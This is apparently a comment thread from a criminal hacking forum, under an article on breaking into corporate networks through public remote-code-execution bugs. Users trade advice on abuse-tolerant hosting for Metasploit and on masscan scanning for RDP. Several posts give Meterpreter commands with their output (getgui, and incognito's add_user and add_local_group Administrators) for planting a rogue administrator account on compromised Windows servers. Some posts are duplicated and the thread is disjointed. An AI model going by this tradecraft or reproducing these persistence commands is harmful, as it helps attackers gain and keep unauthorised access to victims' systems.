hiper-V обычно прилетает спокойно по таргету 1
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Статья Добываем доступы в корпы через паблик RCE
- Автор темы boriselcin
- Дата начала
Очень познавательно! Автору огромное спасибо за труд! Надеюсь, автор будет еще баловать нас подобным материялом!
Я еще постиснялся спросить, нам получается, нужно 2 абузоустойчевых сервера под метасплойт, не самолеты, а обычные vps, но я взглянул на цены, и один такой будет стоит примерно 100$... И не такая уж и бюджетная "рыбалка" получается. Кстати, на masscan прокси требуются?
Еще, хотел спросить, а вы лично какими методами защиты и безопасности пользовались при таких мероприятиях?
Еще, хотел спросить, а вы лично какими методами защиты и безопасности пользовались при таких мероприятиях?
нет
для учебы просто возьми уже какие нибудь (можно найти за 5 баксов )
3000к гривень!
спасибо за отзыв, я имею ввиду 100$ за один сервер абузоустойчевый) Я, правда хотел бы попробовать, но ради спортивного интереса, без корыстной мысли)
да не нужен абузостойчивый, при использовании масскана, тебя скорее сам хостер залочит (и то далеко не факт)
Для спортивного интереса используй так же любой дешманский ВПС 1ядро\1ГБ, либо виртуалку, если уж интерес на 100% спортивный
Я испытываю спортивный интерес для того - что бы не расстраиватся лишний раз, если ничего не получится) А если уж братся за дело - то братся основательно))) И, результатам буду рад, я ж живой человек)
на zomro сервера дешевые + массканом пользуюсь уже год
Digital Ocean. Free
Leenode free
Зачем платить если только ради спортивного интереса
Хотя в правильных руках
Итого вполне достаточно
Посмотри предедещие топики, там все описано
Leenode free
Зачем платить если только ради спортивного интереса
Хотя в правильных руках
Итого вполне достаточно
Посмотри предедещие топики, там все описано
ive been using metasploit from linode/digitalocean. account last easy without anyone taking it down. for scan you need speed i suggest vsys.host as cheap alternative but they will lock server for abuse after 3 weeks -1month, if you have money i recommend masscan.online because you can filter rdp
masssan online is a great idea! Thanks for the advice!
I'm trying to add a new user, has anyone else received it?
meterpreter > run getgui -u system -p Pas0rd123$$$
[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[-] Could not execute getgui: ArgumentError wrong number of arguments (given 2, expected 0..1)
meterpreter >
meterpreter > run getgui -u system -p Pas0rd123$$$
[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[-] Could not execute getgui: ArgumentError wrong number of arguments (given 2, expected 0..1)
meterpreter >
how many rate?
можна получить видео??
Приветствую! Хотел бы узнать, есть ли хитрый способ в масскане/nmap добычи определенных служб? Например rdp, если rdp не на стандартном 3389.
vsys ? 80-100kpps
i suggest you use incognito
in meterpreter:
load incognito
add_user admin123 pass123
add_local_group Administrators admin123 (here depends on language on server, can be administradores, administratoren, administratorzy. administrateurs etc..)
What is the best groomsize you have used?
Бротюни, хелп, запустил метасплоит на винде, все нормас, но не могу прописать путь тхт файла до rhost что бы не в ручную бить. Есть кто знает как это сделать?